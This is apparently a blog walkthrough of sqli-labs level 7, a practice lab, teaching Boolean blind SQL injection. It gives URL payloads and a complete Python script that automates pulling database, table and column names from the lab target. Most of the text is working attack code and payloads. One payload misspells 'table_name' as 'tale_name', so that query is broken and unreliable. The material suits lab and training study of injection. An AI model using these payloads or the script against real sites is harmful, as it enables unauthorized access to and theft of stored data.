"Author's Homepage": Shibie Sanshi wyx
"Author's Profile": CSDN top200, Alibaba Cloud blog expert, Huawei cloud sharing expert, high-quality creator in the field of network security
The seventh level is the character injection of single quotes + double brackets, and Boolean blind injection is recommended.
Method 1: Boolean blinds
Recommended article: Detailed explanation of the use of Boolean blind annotation, principle + steps + practical tutorial
The first step, determine the injection point
Input in the address bar: ?id=1')) and 1 – a, the page is displayed normally
Input in the address bar: ?id=1')) and 0 – a, the page is abnormal (empty) display
The second step, determine the length
To determine whether the length of the currently used database name is greater than 1 (definitely greater than), enter the following in the address bar:
?id=1')) and length(database()) > 1 -- a
The judgment is established, the page is displayed normally, and the Python script is used to automate the judgment at the end of the article
The third step, enumerate characters
To determine whether the ascll code of the first character of the database name is greater than 1 (definitely greater than), enter:
?id=1')) and ascii(substr((database()),1,1)) >1 -- a
The judgment is established, the page is displayed normally, and the Python script is used to automate the judgment at the end of the article
The fourth step, off the library
The Python script is as follows, modified as needed:
import requests
# 将url 替换成你的靶场关卡网址
# 修改两个对应的payload
# 目标网址(不带参数)
url = "http://55aa541ede774f4da9a2d0f63c3f758c.app.mituan.zone/Less-7/"
# 猜解长度使用的payload
payload_len = """?id=1')) and length(
(select group_concat(schema_name)
from information_schema.schemata)
) ={n} -- a"""
# 枚举字符使用的payload
payload_str = """?id=1')) and ascii(
substr(
(select group_concat(schema_name)
from information_schema.schemata
),{n},1)
) ={r} -- a"""
# 获取长度
def getLength(url, payload):
length = 1 # 初始测试长度为1
while True:
response = requests.get(url= url+payload_len.format(n= length))
# 页面中出现此内容则表示成功
if 'You are in....' in response.text:
print('测试长度完成,长度为:', length,)
return length;
else:
print('正在测试长度:',length)
length += 1 # 测试长度递增
# 获取字符
def getStr(url, payload, length):
str = '' # 初始表名/库名为空
# 第一层循环,截取每一个字符
for l in range(1, length+1):
# 第二层循环,枚举截取字符的每一种可能性
for n in range(33, 126):
response = requests.get(url= url+payload_str.format(n= l, r= n))
# print('我正在猜解', n)
# 页面中出现此内容则表示成功
if 'You are in....' in response.text:
str+= chr(n)
print('第', l, '个字符猜解成功:', str)
break;
return str;
# 开始猜解
length = getLength(url, payload_len)
getStr(url, payload_str, length)
Get all databases
and judge the length of the payload:
?id=1')) and length(
(select group_concat(schema_name)
from information_schema.schemata)
) ={n} -- a
Enumerate character payload:
?id=1')) and ascii(
substr(
(select group_concat(schema_name)
from information_schema.schemata
),{n},1)
) ={r} -- a
Execution result:
Get all the tables of the security library
Determine the length of the payload:
?id=1')) and length(
(select group_concat(table_name)
from information_schema.tables
where table_schema="security")
) ={n} -- a
Enumerate character payload:
?id=1')) and ascii(
substr(
(select group_concat(table_name)
from information_schema.tables
where table_schema="security"
),{n},1)
) ={r} -- a
Execution result:
Get all fields of the users table
Determine the length payload:
?id=1')) and length(
(select group_concat(column_name)
from information_schema.columns
where table_schema="security" and table_name="users")
) ={n} -- a
Enumerate character payload:
?id=1')) and ascii(
substr(
(select group_concat(column_name)
from information_schema.columns
where table_schema="security" and tale_name="users"
),{n},1)
) ={r} -- a
Recommended column
"Network Security Quick Start" uses the shortest time to master the core network security technology.
"Shooting Range Clearance Tutorial" The customs clearance tutorials of various shooting ranges are continuously updated...